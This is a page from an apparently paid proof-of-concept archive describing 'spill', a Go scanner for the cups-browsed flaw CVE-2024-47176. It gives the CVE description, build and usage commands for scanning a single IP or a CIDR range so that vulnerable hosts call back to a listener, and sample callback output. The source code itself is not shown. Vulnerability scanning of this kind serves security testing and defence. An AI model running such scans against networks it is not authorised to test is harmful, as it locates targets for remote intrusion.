Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-47176 PoC — cups-browsed binds to `INADDR_ANY:631`, trusting any packet from any source

Source
https://github.com/GO0dspeed/spill
Associated Vulnerability
Title:cups-browsed binds to `INADDR_ANY:631`, trusting any packet from any source (CVE-2024-47176)
Description:CUPS is a standards-based, open-source printing system, and `cups-browsed` contains network printing functionality including, but not limited to, auto-discovering print services and shared printers. `cups-browsed` binds to `INADDR_ANY:631`, causing it to trust any packet from any source, and can cause the `Get-Printer-Attributes` IPP request to an attacker controlled URL. When combined with other vulnerabilities, such as CVE-2024-47076, CVE-2024-47175, and CVE-2024-47177, an attacker can execute arbitrary commands remotely on the target machine without authentication when a malicious printer is printed to.
Description
POC scanner for CVE-2024-47176
Readme
# Spill

Utility to quickly scan over a signle IP / CIDR to search for OpenPrinting CVE 2024-47176 on UDP 631

This utility is quick and ugly - but could be useful to some people.

## Build Project

```
go build .
```

## Quick usage (single IP)

```
go run main.go -ip <target-ip> -port 631 -dest <your listening ip> -destport <your listening port>
OR
./spill -ip <target-ip> -port 631 -dest <your listening ip> -destport <your listening port>
```

## Quick usage (CIDR)

```
go run main.go -cidr <target-range> -port 631 -dest <your listening ip> -destport <your listening port>
OR
./spill -cidr <target-range> -port 631 -dest <your listening ip> -destport <your listening port>
```

## Example Output

```zsh
┌──(kali㉿kali-raspberry-pi)-[~/spill]
└─$ ./spill -ip 192.168.50.174 -port 631 -dest 192.168.50.175 -destport 12345
2024/09/27 03:28:12 Starting HTTP server on port 12345...
2024/09/27 03:28:12 Received POST request: 192.168.50.174:55580
2024/09/27 03:28:12 Received POST request: 192.168.50.174:55592
2024/09/27 03:28:12 Received POST request: 192.168.50.174:55614
2024/09/27 03:28:13 Received POST request: 192.168.50.174:55620
2024/09/27 03:28:13 Received POST request: 192.168.50.174:55636
2024/09/27 03:28:13 Received POST request: 192.168.50.174:55662
```
File Snapshot

 [4.0K]  /data/pocs/33c9e55f3d3348d730fbf02fca0e97458383c210
├── [  24]  go.mod
├── [3.7K]  main.go
└── [1.3K]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →